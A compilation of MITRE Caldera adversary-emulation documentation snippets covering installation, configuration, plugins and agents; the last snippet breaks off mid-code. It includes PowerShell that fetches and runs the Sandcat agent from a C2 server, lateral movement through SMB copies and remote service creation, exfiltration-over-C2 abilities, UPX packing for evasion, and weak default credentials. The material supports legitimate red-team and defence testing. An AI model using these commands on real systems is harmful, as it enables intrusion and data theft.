### Concise Caldera Installation (Bash) Source: https://caldera.readthedocs.io/en/latest/Installing-Caldera Installs MITRE Caldera using four commands in the terminal. It clones the repository, navigates into the directory, installs Python dependencies, and starts the server with build and insecure flags. This is the quickest way to get Caldera up and running. ```bash git clone https://github.com/mitre/caldera.git --recursive cd caldera pip3 install -r requirements.txt python3 server.py --insecure --build ``` -------------------------------- ### Starting Caldera Server (Bash) Source: https://caldera.readthedocs.io/en/latest/Installing-Caldera Starts the MITRE Caldera server using Python 3. The `--build` argument is necessary for the initial startup or after pulling the latest changes to compile necessary components. The server is typically accessed via http://localhost:8888. ```bash python3 server.py --build ``` -------------------------------- ### Install Caldera with Python Source: https://context7.com/context7/caldera_readthedocs_io_en/llms.txt Installs Caldera by cloning the repository, installing Python dependencies, and starting the server. Requires Python 3 and pip. The --build flag is necessary for the initial run. ```bash # Clone repository with all plugins git clone https://github.com/mitre/caldera.git --recursive --branch 5.0.0 cd caldera # Install Python dependencies pip3 install -r requirements.txt # Start server (--build flag required on first run) python3 server.py --insecure --build # Access web interface at http://localhost:8888 # Default credentials in conf/local.yml file ``` -------------------------------- ### Concise Caldera Installation (Shell) Source: https://caldera.readthedocs.io/en/latest/_sources/Installing-Caldera This snippet provides the four essential shell commands to quickly install MITRE Caldera. It involves cloning the repository, navigating into the directory, installing Python dependencies, and building/running the server. ```sh git clone https://github.com/mitre/caldera.git --recursive cd caldera pip3 install -r requirements.txt python3 server.py --insecure --build ``` -------------------------------- ### Caldera Server Configuration File Example (YAML) Source: https://caldera.readthedocs.io/en/latest/Server-Configuration An example of Caldera's YAML configuration file, detailing various parameters for server operation, plugins, authentication, and requirements. This file controls how the Caldera server boots and runs. ```yaml ability_refresh: 60 api_key_blue: BLUEADMIN123 api_key_red: ADMIN123 app.contact.dns.domain: mycaldera.caldera app.contact.dns.socket: 0.0.0.0:53 app.contact.gist: API_KEY app.contact.html: /weather app.contact.http: http://0.0.0.0:8888 app.contact.tcp: 0.0.0.0:7010 app.contact.udp: 0.0.0.0:7011 app.contact.websocket: 0.0.0.0:7012 app.frontend.api_base_url: http://localhost:8888 objects.planners.default: atomic crypt_salt: REPLACE_WITH_RANDOM_VALUE encryption_key: ADMIN123 exfil_dir: /tmp host: 0.0.0.0 plugins: - access - atomic - compass - debrief - fieldmanual - gameboard - manx - response - sandcat - stockpile - training port: 8888 reports_dir: /tmp auth.login.handler.module: default requirements: go: command: go version type: installed_program version: 1.11 python: attr: version module: sys type: python_module version: 3.8.0 users: blue: blue: admin red: admin: admin red: admin ``` -------------------------------- ### Example Custom Login Handler Implementation Source: https://caldera.readthedocs.io/en/latest/_sources/Server-Configuration An example of a Python module implementing a custom login handler for Caldera. It demonstrates the structure required, including the `load_login_handler` function and a class extending `LoginHandlerInterface` with placeholder methods for login handling. ```python from app.service.interfaces.i_login_handler import LoginHandlerInterface HANDLER_NAME = 'My Custom Login Handler' def load_login_handler(services): return CustomLoginHandler(services, HANDLER_NAME) class CustomLoginHandler(LoginHandlerInterface): def __init__(self, services, name): super().__init__(services, name) async def handle_login(self, request, **kwargs): # Handle login pass async def handle_login_redirect(self, request, **kwargs): # Handle login redirect pass ``` -------------------------------- ### Install HAProxy on Linux Source: https://caldera.readthedocs.io/en/latest/Plugin-library Installs HAProxy version 1.8 or greater on Linux systems using the apt-get package manager. HAProxy is a required dependency for the Caldera SSL plugin. ```bash sudo apt-get install haproxy ``` -------------------------------- ### Create and Start Service for Sandcat Execution using PowerShell Source: https://caldera.readthedocs.io/en/latest/Lateral-Movement-Guide This PowerShell command sequence creates a new Windows service named 'sandsvc' configured to execute the Sandcat binary remotely. It includes commands to start the service, pause for execution, and then clean up by stopping and deleting the service, and terminating the Sandcat process. ```powershell sc.exe \#{remote.host.fqdn} create sandsvc start= demand error= ignore binpath= "cmd /c start C:\Users\Public\s4ndc4t.exe -server #{server} -v -originLinkID #{origin_link_id}" displayname= "Sandcat Execution"; sc.exe \#{remote.host.fqdn} start sandsvc; Start-Sleep -s 15; Get-Process -ComputerName #{remote.host.fqdn} s4ndc4t; ``` -------------------------------- ### Install Caldera with Docker Source: https://context7.com/context7/caldera_readthedocs_io_en/llms.txt Installs and runs Caldera using Docker. This method involves building a Docker image and then running it as a container with port forwarding. Ensure Docker is installed. ```bash # Clone repository git clone https://github.com/mitre/caldera.git --recursive --branch 5.0.0 cd caldera # Build Docker image docker build --build-arg WIN_BUILD=true . -t caldera:server # Run container with port forwarding docker run -p 7010:7010 -p 7011:7011/udp -p 7012:7012 -p 8888:8888 caldera:server # Gracefully stop container docker ps # Get container ID docker kill --signal=SIGINT [container_id] ``` -------------------------------- ### Rule Configuration Example in Caldera Source: https://caldera.readthedocs.io/en/latest/Basic-Usage Demonstrates how to define rules for fact usage in Caldera, specifying actions (ALLOW/DENY), fact names, and regex matches. This allows granular control over which facts can be utilized during an operation. ```yaml rules: - action: DENY fact: file.sensitive.extension match: .* - action: ALLOW fact: file.sensitive.extension match: txt ``` -------------------------------- ### Downloading Dependencies for Offline Caldera Installation (Shell) Source: https://caldera.readthedocs.io/en/latest/_sources/Installing-Caldera On a machine with internet access, these commands clone the Caldera repository and download all necessary Python dependencies listed in 'requirements.txt' into a dedicated directory 'caldera/python_deps'. This is the first step for an offline installation. ```sh git clone https://github.com/mitre/caldera.git --recursive --branch x.x.x mkdir caldera/python_deps pip3 download -r caldera/requirements.txt --dest caldera/python_deps ``` -------------------------------- ### Caldera Server Configuration (YAML) Source: https://context7.com/context7/caldera_readthedocs_io_en/llms.txt Example configuration file for the Caldera server. This YAML file defines various settings including API keys, network contacts, plugin loading, and user credentials. ```yaml # conf/local.yml ability_refresh: 60 api_key_blue: BLUEADMIN123 api_key_red: ADMIN123 app.contact.http: http://0.0.0.0:8888 app.contact.tcp: 0.0.0.0:7010 app.contact.udp: 0.0.0.0:7011 app.contact.websocket: 0.0.0.0:7012 crypt_salt: REPLACE_WITH_RANDOM_VALUE encryption_key: ADMIN123 exfil_dir: /tmp host: 0.0.0.0 plugins: - access - atomic - stockpile - sandcat - response port: 8888 reports_dir: /tmp users: red: admin: admin red: admin blue: blue: admin ``` -------------------------------- ### Ability File Example with File Uploads (YAML) Source: https://caldera.readthedocs.io/en/latest/_sources/Basic-Usage An example of a Caldera ability file written in YAML format. It demonstrates the 'uploads' keyword to specify files that the agent should upload to the C2 server after executing the ability. The command section includes file creation, and the cleanup section removes these files. ```yaml --- - id: 22b9a90a-50c6-4f6a-a1a4-f13cb42a26fd name: Upload file example description: Example ability to upload files tactic: exfiltration technique: attack_id: T1041 name: Exfiltration Over C2 Channel platforms: darwin,linux: sh: command: | echo "test" > /tmp/absolutepath.txt; echo "test2" > ./localpath.txt; cleanup: | rm -f /tmp/absolutepath.txt ./localpath.txt; uploads: - /tmp/absolutepath.txt - ./localpath.txt ``` -------------------------------- ### Install HAProxy on MacOS Source: https://caldera.readthedocs.io/en/latest/Plugin-library Installs HAProxy version 1.8 or greater on macOS using the Homebrew package manager. HAProxy is a required dependency for the Caldera SSL plugin. ```bash brew install haproxy ``` -------------------------------- ### Buckets Planner Implementation (Python) Source: https://caldera.readthedocs.io/en/latest/_sources/Basic-Usage The _buckets_ planner, a Python module, serves as an example for building custom planners. It showcases how to utilize Caldera's planning service utilities to implement decision logic for selecting and ordering abilities within an operation. This planner is also found in the `mitre/stockpile` repository. ```python # The _buckets_ planner can be found in the `mitre/stockpile` GitHub repository at `app/buckets.py`. # Example conceptual representation of its logic: # class BucketsPlanner: # def __init__(self, operation, planning_svc): # self.operation = operation # self.planning_svc = planning_svc # def execute(self): # # Logic demonstrating custom decision-making using planning_svc. # pass ``` -------------------------------- ### Bash Script for NMAP Scan Example Source: https://caldera.readthedocs.io/en/latest/_sources/Initial-Access-Attacks A simple bash script that utilizes NMAP to scan a target IP address for open ports and services. It takes the target IP as a command-line argument and prints log messages before and after the scan. This script serves as a basic example of a payload binary for Caldera abilities. ```bash #!/bin/bash echo '[+] Starting basic NMAP scan' nmap -Pn $1 echo '[+] Complete with module' ``` -------------------------------- ### Installing Offline Caldera Dependencies (Bash) Source: https://caldera.readthedocs.io/en/latest/Installing-Caldera Installs MITRE Caldera dependencies on an offline server using pre-downloaded packages. The `--no-index` flag prevents pip from searching online repositories, and `--find-links` directs it to the local directory containing the downloaded dependencies. ```bash pip3 install -r caldera/requirements.txt --no-index --find-links caldera/python_deps ``` -------------------------------- ### Caldera Ability Example: Upload Files (YAML) Source: https://caldera.readthedocs.io/en/latest/Basic-Usage An example of a Caldera ability defined in YAML format that demonstrates uploading files from the agent to the C2 server. It specifies commands for creating files and cleanup commands for removing them. ```yaml --- - id: 22b9a90a-50c6-4f6a-a1a4-f13cb42a26fd name: Upload file example description: Example ability to upload files tactic: exfiltration technique: attack_id: T1041 name: Exfiltration Over C2 Channel platforms: darwin,linux: sh: command: | echo "test" > /tmp/absolutepath.txt; echo "test2" > ./localpath.txt; cleanup: | rm -f /tmp/absolutepath.txt ./localpath.txt; uploads: - /tmp/absolutepath.txt - ./localpath.txt ``` -------------------------------- ### Downloading Caldera Dependencies for Offline Install (Bash) Source: https://caldera.readthedocs.io/en/latest/Installing-Caldera Downloads all Python dependencies required by MITRE Caldera into a dedicated directory. This is part of the offline installation process, preparing the dependencies to be transferred to an air-gapped server. ```bash git clone https://github.com/mitre/caldera.git --recursive --branch x.x.x mkdir caldera/python_deps pip3 download -r caldera/requirements.txt --dest caldera/python_deps ``` -------------------------------- ### Python: Caldera Planner Bucket Method Example Source: https://caldera.readthedocs.io/en/latest/How-to-Build-Planners This Python code snippet demonstrates a typical bucket method within the Caldera planner. It shows how to interact with planning services like exhaust_bucket and set the next state in the operation's bucket machine. This method is part of the state machine logic for orchestrating agent actions. ```python await self.planning_svc.exhaust_bucket(self, 'lateral_movement', self.operation) self.next_bucket = 'privilege_escalation' ``` -------------------------------- ### Run Sandcat Agent with SMB Pipe Proxy Receiver and Manual Peer Connection Source: https://caldera.readthedocs.io/en/latest/_sources/Sandcat-Peer-to-Peer This command starts a Sandcat agent with an SMB Pipe proxy receiver enabled. It then manually connects to another agent's SMB pipe to communicate with the C2, demonstrating a form of P2P chaining. ```powershell C:\Users\Public\sandcat.exe -server \\WORKSTATION1\pipe\agentpipe -listenP2P ``` -------------------------------- ### Caldera Subnet Rule Example Source: https://caldera.readthedocs.io/en/latest/_sources/Basic-Usage Illustrates how to use subnet matching within Caldera rules. This example denies all 'my.host.ip' facts but specifically allows those within the '10.245.112.0/24' subnet. ```yaml - action: DENY fact: my.host.ip match: .* - action: ALLOW fact: my.host.ip match: 10.245.112.0/24 ``` -------------------------------- ### Caldera Sandcat Hook Example (Python) Source: https://caldera.readthedocs.io/en/latest/Basic-Usage A Python file that demonstrates how Caldera handles special payloads by assigning functions to execute on the server when specific payloads are requested for download. This is an example of custom payload handling. ```python plugins/sandcat/hook.py ``` -------------------------------- ### Building Caldera Docker Image (Bash) Source: https://caldera.readthedocs.io/en/latest/Installing-Caldera Builds the Docker image for MITRE Caldera. It uses the `docker build` command with a build argument to potentially include Windows build components and tags the image as 'caldera:server'. ```bash cd caldera docker build --build-arg WIN_BUILD=true . -t caldera:server ``` -------------------------------- ### Compile and Run Agent with Peer-to-Peer Enabled (PowerShell) Source: https://caldera.readthedocs.io/en/latest/Sandcat-Peer-to-Peer This PowerShell example demonstrates the complete process of downloading a Sandcat agent with specific gocat extensions and then running it with peer-to-peer capabilities enabled. It shows how to set custom headers for platform, file, and gocat extensions during the download, and then how to execute the compiled agent using the `-listenP2P` flag to activate its proxy receivers. ```PowerShell $url="http://192.168.137.122:8888/file/download"; $wc=New-Object System.Net.WebClient; $wc.Headers.add("platform","windows"); $wc.Headers.add("file","sandcat.go"); $wc.Headers.add("gocat-extensions","proxy_http,proxy_smb_pipe"); # Include gocat extensions for the proxy protocols. $output="C:\Users\Public\sandcat.exe"; $wc.DownloadFile($url,$output); C:\Users\Public\sandcat.exe -server http://192.168.137.122:8888 -v -listenP2P; ``` -------------------------------- ### Python Application Factory Function Source: https://caldera.readthedocs.io/en/latest/_generated/app.api The `make_app()` function is a core part of the application setup, responsible for creating and configuring the FastAPI application instance. It likely orchestrates the setup of various components, including routes, middleware, and database connections, within the `app.api.v2` module. ```python from fastapi import FastAPI def make_app() -> FastAPI: """Factory function to create the FastAPI application.""" app = FastAPI() # ... configuration and setup ... return app ``` -------------------------------- ### Example GitHub Fact Configuration (Commented Out) Source: https://caldera.readthedocs.io/en/latest/_sources/plugins/stockpile/Exfiltration-How-Tos This snippet demonstrates the default commented-out structure for GitHub exfiltration facts within the Caldera fact source file. Users need to uncomment specific lines and provide their own values for successful exfiltration. ```yaml # GitHub Exfiltration # ------------------------------------- #- trait: github.user.name <--- Uncomment # value: CHANGEME-BOTH <--- Uncomment & Update #- trait: github.access.token <--- Uncomment # value: CHANGEME-BOTH <--- Uncomment & Update #- trait: github.repository.name # value: CHANGEME-RepoOnly #- trait: github.repository.branch # value: CHANGEME-RepoOnly ``` -------------------------------- ### Caldera Packer Integration Example (YAML) Source: https://caldera.readthedocs.io/en/latest/Basic-Usage An example demonstrating how to specify a packer (like UPX) in an ability file's payload section to obfuscate files further for host machine detection evasion. The packer module name is prepended to the filename. ```yaml - upx:Akagi64.exe ``` -------------------------------- ### Run Sandcat Agent with SMB Pipe Proxy Receiver (Command Prompt) Source: https://caldera.readthedocs.io/en/latest/Sandcat-Peer-to-Peer This command runs a Sandcat agent with an SMB pipe proxy receiver enabled, allowing other agents to connect to it. It requires the 'proxy_smb_pipe' gocat extension to be installed. ```bash C:\\Users\\Public\\sandcat.exe -server \\WORKSTATION1\pipe\agentpipe -listenP2P ``` -------------------------------- ### BaseService Management - Python Source: https://caldera.readthedocs.io/en/latest/_generated/app Defines the base service class for the application, providing methods to add, get, and remove services from a registry. This allows for centralized management and retrieval of different service instances within the application. ```python class _app.utility.base_service.BaseService: add_service(_name_ , _svc_) _classmethod _get_service(_name_) _classmethod _get_services() _classmethod _remove_service(_name_) ``` -------------------------------- ### Building Caldera with Docker Compose (Bash) Source: https://caldera.readthedocs.io/en/latest/Installing-Caldera Builds the Docker image for MITRE Caldera using Docker Compose. This command reads the `docker-compose.yml` file to set up the necessary services and configurations for the Caldera container. ```bash docker-compose build ``` -------------------------------- ### Download and Run Sandcat Agent with SMB Pipe Proxy (PowerShell) Source: https://caldera.readthedocs.io/en/latest/Sandcat-Peer-to-Peer This PowerShell script downloads a Sandcat agent binary with the SMB pipe proxy extension, transfers it, and then runs it to connect to a specified SMB pipe proxy receiver on a peer. Ensure the 'proxy_smb_pipe' gocat extension is installed when compiling the agent. ```powershell $url="http://192.168.137.122:8888/file/download"; $wc=New-Object System.Net.WebClient; $wc.Headers.add("platform","windows"); $wc.Headers.add("file","sandcat.go"); $wc.Headers.add("gocat-extensions","proxy_smb_pipe"); # Required extension for SMB Pipe proxy. $output="C:\\Users\\Public\\sandcat.exe"; $wc.DownloadFile($url,$output); # ... # ... transfer SMB Pipe-enabled binary to new machine via lateral movement technique # ... # Run new agent C:\\Users\\Public\\sandcat.exe -server \\WORKSTATION1\pipe\agentpipe -c2 SmbPipe; ``` -------------------------------- ### Building Docker Image for Caldera (Shell) Source: https://caldera.readthedocs.io/en/latest/_sources/Installing-Caldera This command builds the Docker image for MITRE Caldera. The `--build-arg WIN_BUILD=true` flag is used if a Windows build is intended. The image is tagged as 'caldera:server'. ```sh cd caldera docker build --build-arg WIN_BUILD=true . -t caldera:server ``` -------------------------------- ### Basic Caldera Plugin Structure (Python) Source: https://caldera.readthedocs.io/en/latest/_sources/How-to-Build-Plugins Defines the essential structure for a Caldera plugin, including its name, description, and an `enable` function. This serves as a starting point for custom plugin development. It requires no external dependencies beyond Python's standard library. ```python name = 'Abilities' description = 'A sample plugin for demonstration purposes' address = None async def enable(services): pass ``` -------------------------------- ### Plugin with REST API Endpoint (hook.py) Source: https://caldera.readthedocs.io/en/latest/How-to-Build-Plugins Extends a basic plugin by adding a REST API endpoint using `aiohttp`. This example shows how to register a route (`/get/abilities`) that, when accessed, fetches and returns a list of abilities from the data service in JSON format. It utilizes `web.json_response` for the response. ```python from aiohttp import web name = 'Abilities' description = 'A sample plugin for demonstration purposes' address = None async def enable(services): app = services.get('app_svc').application fetcher = AbilityFetcher(services) app.router.add_route('*', '/get/abilities', fetcher.get_abilities) class AbilityFetcher: def __init__(self, services): self.services = services async def get_abilities(self, request): abilities = await self.services.get('data_svc').locate('abilities') return web.json_response(dict(abilities=[a.display for a in abilities])) ``` -------------------------------- ### Copy Sandcat via SMB (Windows PSH) Source: https://caldera.readthedocs.io/en/latest/_sources/Lateral-Movement-Guide This ability copies the Sandcat agent executable ('sandcat.go-windows') to the remote host's C$ share using PowerShell. It includes a cleanup command to remove the copied file and requires the remote host to have SMB shares accessible and the Sandcat file to exist locally. ```yaml - id: 65048ec1-f7ca-49d3-9410-10813e472b30 name: Copy Sandcat (SMB) description: Copy Sandcat to remote host (SMB) tactic: lateral-movement technique: attack_id: T1021.002 name: "Remote Services: SMB/Windows Admin Shares" platforms: windows: psh: command: | $path = "sandcat.go-windows"; $drive = "\\#{remote.host.fqdn}\C$"; Copy-Item -v -Path $path -Destination $drive"\Users\Public\s4ndc4t.exe"; cleanup: | $drive = "\\#{remote.host.fqdn}\C$"; Remove-Item -Path $drive"\Users\Public\s4ndc4t.exe" -Force; parsers: plugins.stockpile.app.parsers.54ndc47_remote_copy: - source: remote.host.fqdn edge: has_54ndc47_copy requirements: - plugins.stockpile.app.requirements.not_exists: - source: remote.host.fqdn edge: has_54ndc47_copy - plugins.stockpile.app.requirements.basic: - source: remote.host.fqdn edge: has_share - plugins.stockpile.app.requirements.no_backwards_movement: - source: remote.host.fqdn ``` -------------------------------- ### View Remote Shares using PowerShell and CMD Source: https://caldera.readthedocs.io/en/latest/Lateral-Movement-Guide This snippet demonstrates how to view network shares on a remote host using both PowerShell and Command Prompt. It utilizes the 'net view' command and specifies how to parse the output to extract share information. ```powershell net view \#{remote.host.fqdn} /all ``` ```cmd net view \#{remote.host.fqdn} /all ``` -------------------------------- ### Set Go Environment Variables (Bash) Source: https://caldera.readthedocs.io/en/latest/Troubleshooting This snippet demonstrates how to set the Go environment variables, specifically adding the Go binaries to the PATH. This is crucial for dynamic compilation of Sandcat agents if Go is installed in a non-standard location. ```bash export PATH=$PATH:/usr/local/go/bin ``` -------------------------------- ### Caldera Knowledge Service Rule Management (Python) Source: https://caldera.readthedocs.io/en/latest/How-to-Build-Planners Provides Python examples for managing rules within the Caldera Knowledge Service. This covers adding, deleting, and retrieving rules using criteria dictionaries for selection, enabling efficient rule administration. ```python knowledge_svc.add_rule(rule_object) knowledge_svc.delete_rule(criteria_dict) knowledge_svc.get_rules(criteria_dict) ``` -------------------------------- ### Agent Command Line Options for Proxy and Peer-to-Peer Source: https://caldera.readthedocs.io/en/latest/Sandcat-Peer-to-Peer This snippet outlines key command-line flags for configuring agents for proxy and peer-to-peer communication. The `-listenP2P` flag is essential for activating all supported peer-to-peer proxy receivers on an agent. The provided examples also show how the `-H` flag can be used to include headers like `gocat-extensions` and `includeProxyPeers` when downloading the agent. ```CLI sandcat.exe -listenP2P -H "gocat-extensions:proxy_http" -H "includeProxyPeers:HTTP" ``` -------------------------------- ### Caldera Server Startup Parameters Source: https://caldera.readthedocs.io/en/latest/_sources/Server-Configuration This details the command-line arguments supported by the Caldera server script (`server.py`) for controlling its startup behavior, logging, data management, and plugin loading. ```text server.py --log {DEBUG,INFO,WARNING,ERROR,CRITICAL} server.py --fresh server.py --environment ENVIRONMENT server.py --plugins PLUGINS server.py --insecure ``` -------------------------------- ### Sandcat Agent Verbose Output with SSH Tunnel (Log) Source: https://caldera.readthedocs.io/en/latest/C2-Tunneling This log output shows the detailed steps and status messages generated by the sandcat agent when operating with SSH tunneling. It includes information about starting the SSH tunnel, local endpoint, remote endpoint, communication channel setup, and beacon status. ```log SStarting sandcat in verbose mode. [*] Starting SSH tunnel Starting local tunnel endpoint at localhost:52649 Setting server tunnel endpoint at 192.168.140.1:8022 Setting remote endpoint at localhost:8888 [*] Listening on local SSH tunnel endpoint [*] SSH tunnel ready and listening on http://localhost:52649. [*] Attempting to set channel HTTP Beacon API=/beacon [*] Set communication channel to HTTP initial delay=0 server=http://192.168.140.1:8888 upstream dest addr=http://localhost:52649 group=red privilege=User allow local p2p receivers=false beacon channel=HTTP Local tunnel endpoint=http://localhost:52649 [*] Accepted connection on local SSH tunnel endpoint [*] Listening on local SSH tunnel endpoint [*] Forwarding connection to server [*] Opened remote connection through tunnel [+] Beacon (HTTP): ALIVE ``` -------------------------------- ### Planner Initialization Details in Python Source: https://caldera.readthedocs.io/en/latest/_sources/How-to-Build-Planners Expands on the __init__ method for the LogicalPlanner, detailing the purpose of storing operation, planning_svc, and stopping_conditions. It also explains the role of self.stopping_condition_met in controlling bucket execution. ```python def __init__(self, operation, planning_svc, stopping_conditions=()): self.operation = operation self.planning_svc = planning_svc self.stopping_conditions = stopping_conditions self.stopping_condition_met = False ``` -------------------------------- ### Define Planner's Execute Entrypoint in Python Source: https://caldera.readthedocs.io/en/latest/How-to-Build-Planners The `execute` method serves as the planner's entrypoint, initiating runtime initialization. It calls `planning_svc.execute_planner` to begin executing buckets based on `self.next_bucket` until `self.stopping_condition_met` becomes true. ```python async def execute(self): await self.planning_svc.execute_planner(self) ``` -------------------------------- ### Create and Execute Sandcat Service (Windows PSH) Source: https://caldera.readthedocs.io/en/latest/_sources/Lateral-Movement-Guide This ability creates and starts a Windows service named 'sandsvc' to execute a remote Sandcat binary ('s4ndc4t.exe'). It includes commands to stop and delete the service, and kill the Sandcat process as cleanup. The command utilizes 'sc.exe' for service management and 'taskkill' for process termination. ```yaml - id: 95727b87-175c-4a69-8c7a-a5d82746a753 name: Service Creation description: Create a service named "sandsvc" to execute remote Sandcat binary named "s4ndc4t.exe" tactic: execution technique: attack_id: T1569.002 name: 'System Services: Service Execution' platforms: windows: psh: timeout: 300 cleanup: | sc.exe \#{remote.host.fqdn} stop sandsvc; sc.exe \#{remote.host.fqdn} delete sandsvc /f; taskkill /s \#{remote.host.fqdn} /FI "Imagename eq s4ndc4t.exe" command: | sc.exe \#{remote.host.fqdn} create sandsvc start= demand error= ignore binpath= "cmd /c start C:\Users\Public\s4ndc4t.exe -server #{server} -v -originLinkID #{origin_link_id}" displayname= "Sandcat Execution"; sc.exe \#{remote.host.fqdn} start sandsvc; Start-Sleep -s 15; Get-Process -ComputerName #{remote.host.fqdn} s4ndc4t; ``` -------------------------------- ### Installing Caldera Dependencies (Bash) Source: https://caldera.readthedocs.io/en/latest/Installing-Caldera Installs the Python package dependencies for MITRE Caldera by referencing the requirements.txt file. This command should be run after cloning the repository and is essential for the server to function correctly. It may require sudo privileges. ```bash sudo pip3 install -r requirements.txt ``` -------------------------------- ### Compile Sandcat Agent with .app Extension (Mac/Unix - Shell) Source: https://caldera.readthedocs.io/en/latest/How-to-Build-Agents This command compiles the Sandcat agent for macOS or Unix-like systems, outputting a file with a .app extension. It sets the operating system to darwin and applies linker flags for a smaller binary. ```shell GOOS=darwin go build -o ../payloads/sandcat.app -ldflags="-s -w" sandcat.go ``` -------------------------------- ### Installing Offline Caldera Dependencies (Shell) Source: https://caldera.readthedocs.io/en/latest/_sources/Installing-Caldera On the offline server, this command installs the Python dependencies for MITRE Caldera using the pre-downloaded files. The '--no-index' flag prevents pip from searching online, and '--find-links' points to the directory containing the downloaded dependencies. ```sh pip3 install -r caldera/requirements.txt --no-index --find-links caldera/python_deps ``` -------------------------------- ### Python InstructionSchema Class Methods Source: https://caldera.readthedocs.io/en/latest/_generated/app.objects Outlines the InstructionSchema class in app.objects.secondclass.c_instruction, including methods for building instructions and accessing schema options. ```python class InstructionSchema: def build_instruction(self): pass @property def opts(self): pass ``` -------------------------------- ### Core System API - app.api.v2 Package Source: https://caldera.readthedocs.io/en/latest/_generated/app.api This section provides an overview of the core system API, specifically focusing on the `app.api.v2` package and its sub-modules and namespaces. It outlines the structure and components available for interacting with the Caldera core functionalities. ```APIDOC ## Core System API - app.api.v2 Package ### Description Provides access to the core functionalities of the MITRE Caldera system through a RESTful API. This package contains handlers, managers, schemas, and error definitions for interacting with the platform. ### Method N/A (This is a structural overview) ### Endpoint N/A (This is a structural overview) ### Parameters N/A ### Request Example N/A ### Response N/A ## app.api.v2.errors Module ### Description Defines custom error classes used within the `app.api.v2` package for request validation and data handling. ### Method N/A ### Endpoint N/A ### Parameters N/A ### Request Example N/A ### Response N/A #### Error Types - **DataValidationError**: Indicates an issue with the format or content of data. - **RequestBodyParseError**: Signifies a problem parsing the request body. - **RequestUnparsableJsonError**: Occurs when the request body is not valid JSON. - **RequestValidationError**: General validation error for requests. ## app.api.v2.responses Module ### Description Contains utility functions and classes for generating standardized JSON HTTP responses, including error responses and success messages. ### Method N/A ### Endpoint N/A ### Parameters N/A ### Request Example N/A ### Response N/A #### Response Types - **JsonHttpBadRequest**: For 400 Bad Request responses. - **JsonHttpErrorResponse**: A generic JSON error response. - **JsonHttpForbidden**: For 403 Forbidden responses. - **JsonHttpNotFound**: For 404 Not Found responses. #### Middleware Functions - **apispec_request_validation_middleware()**: Middleware for API spec request validation. - **json_request_validation_middleware()**: Middleware for JSON request validation. ``` -------------------------------- ### Compile Sandcat Agent with .bin Extension (Linux - Shell) Source: https://caldera.readthedocs.io/en/latest/How-to-Build-Agents This command compiles the Sandcat agent for Linux, outputting a file with a .bin extension. It sets the operating system to Linux and applies linker flags for a smaller binary. ```shell GOOS=linux go build -o ../payloads/sandcat.bin -ldflags="-s -w" sandcat.go ``` -------------------------------- ### Sample Caldera Ability Definition Source: https://caldera.readthedocs.io/en/latest/Basic-Usage Defines a sample ability for scanning WIFI networks, demonstrating the structure for multiple platforms (Darwin, Linux, Windows) and their respective commands and payloads. It includes details on required fields and platform executors. ```yaml - id: 9a30740d-3aa8-4c23-8efa-d51215e8a5b9 name: Scan WIFI networks description: View all potential WIFI networks on host tactic: discovery technique: attack_id: T1016 name: System Network Configuration Discovery platforms: darwin: sh: command: | ./wifi.sh scan payload: wifi.sh linux: sh: command: | ./wifi.sh scan payload: wifi.sh windows: psh: command: | .\wifi.ps1 -Scan payload: wifi.ps1 ``` -------------------------------- ### Batch Planner Implementation (Python) Source: https://caldera.readthedocs.io/en/latest/_sources/Basic-Usage The _batch_ planner, written in Python, retrieves all available and applicable ability commands for an operation and sends them to the agents. It uses the planning service to match abilities to agents based on OS and fact availability. This planner is recommended for profiles with repeatable abilities as it re-evaluates available abilities after each batch completion. ```python # The _batch_ planner can be found in the `mitre/stockpile` GitHub repository at `app/batch.py`. # Example conceptual representation of its logic: # class BatchPlanner: # def __init__(self, operation, planning_svc): # self.operation = operation # self.planning_svc = planning_svc # def execute(self): # # Logic to retrieve all applicable abilities, send in batches, # # and re-evaluate after completion. # pass ``` -------------------------------- ### Cloning Specific Caldera Version (Bash) Source: https://caldera.readthedocs.io/en/latest/Installing-Caldera Clones a specific version of the MITRE Caldera repository recursively. This command allows users to specify a release tag (e.g., 'x.x.x') to ensure a stable and tested version is installed, avoiding potential bugs from non-release branches. ```bash git clone https://github.com/mitre/caldera.git --recursive --branch x.x.x ``` -------------------------------- ### Agent Development: HTTP Beacon (Initial Check-in) Source: https://context7.com/context7/caldera_readthedocs_io_en/llms.txt This bash script shows the process for an agent to perform its initial check-in with the Caldera server. It first constructs a JSON profile containing agent details, base64 encodes it, and then sends it via a POST request to the /beacon endpoint. The response, containing instructions, is decoded. ```bash # Create agent profile with required properties profile=$(echo '{ "server":"http://127.0.0.1:8888", "platform":"darwin", "host":"macbook-pro", "group":"red", "username":"admin", "architecture":"x86_64", "executors":["sh"], "privilege":"Elevated", "pid":12345, "ppid":1, "location":"/usr/local/bin/agent", "exe_name":"agent", "host_ip_addrs":["192.168.1.100"], "deadman_enabled":true }' | base64) # Send beacon to server curl -s -X POST -d $profile localhost:8888/beacon | base64 --decode # Response example: # { # "paw": "dcoify", # "sleep": 59, # "watchdog": 0, # "instructions": [ # { # "id": "abc123", # "sleep": 5, # "command": "bHMgLWxh", # "executor": "sh", # "timeout": 60, # "payload": "", # "uploads": [] # } # ] # } ``` -------------------------------- ### Cloning Caldera Repository with Specific Version (Shell) Source: https://caldera.readthedocs.io/en/latest/_sources/Installing-Caldera This command clones the MITRE Caldera repository, including all submodules, and checks out a specific version or release branch. It's recommended to use a release version (e.g., 'x.x.x') to avoid potential bugs. This is a prerequisite for both standard and Docker installations. ```sh git clone https://github.com/mitre/caldera.git --recursive --branch x.x.x ``` -------------------------------- ### Initialize LogicalPlanner Class in Python Source: https://caldera.readthedocs.io/en/latest/How-to-Build-Planners The `__init__` method initializes the `LogicalPlanner` with operation details, a planning service handle, and optional stopping conditions. It also sets up internal state variables like `stopping_condition_met`, `state_machine`, and `next_bucket` to manage the planning process. ```python class LogicalPlanner: def __init__(self, operation, planning_svc, stopping_conditions=()): self.operation = operation self.planning_svc = planning_svc self.stopping_conditions = stopping_conditions self.stopping_condition_met = False self.state_machine = ['privilege_escalation', 'persistence', 'collection', 'discovery', 'lateral_movement'] self.next_bucket = 'privilege_escalation' ``` -------------------------------- ### Python Plugin Hook for Abilities Display Source: https://caldera.readthedocs.io/en/latest/How-to-Build-Plugins This Python script integrates an HTML template to display plugin abilities. It sets up routes for fetching abilities data and rendering the 'abilities.html' template. It utilizes aiohttp and jinja2 for web serving and templating, and Caldera's service layer for data access and authorization. ```python from aiohttp_jinja2 import template, web from app.service.auth_svc import check_authorization name = 'Abilities' description = 'A sample plugin for demonstration purposes' address = '/plugin/abilities/gui' async def enable(services): app = services.get('app_svc').application fetcher = AbilityFetcher(services) app.router.add_route('*', '/plugin/abilities/gui', fetcher.splash) 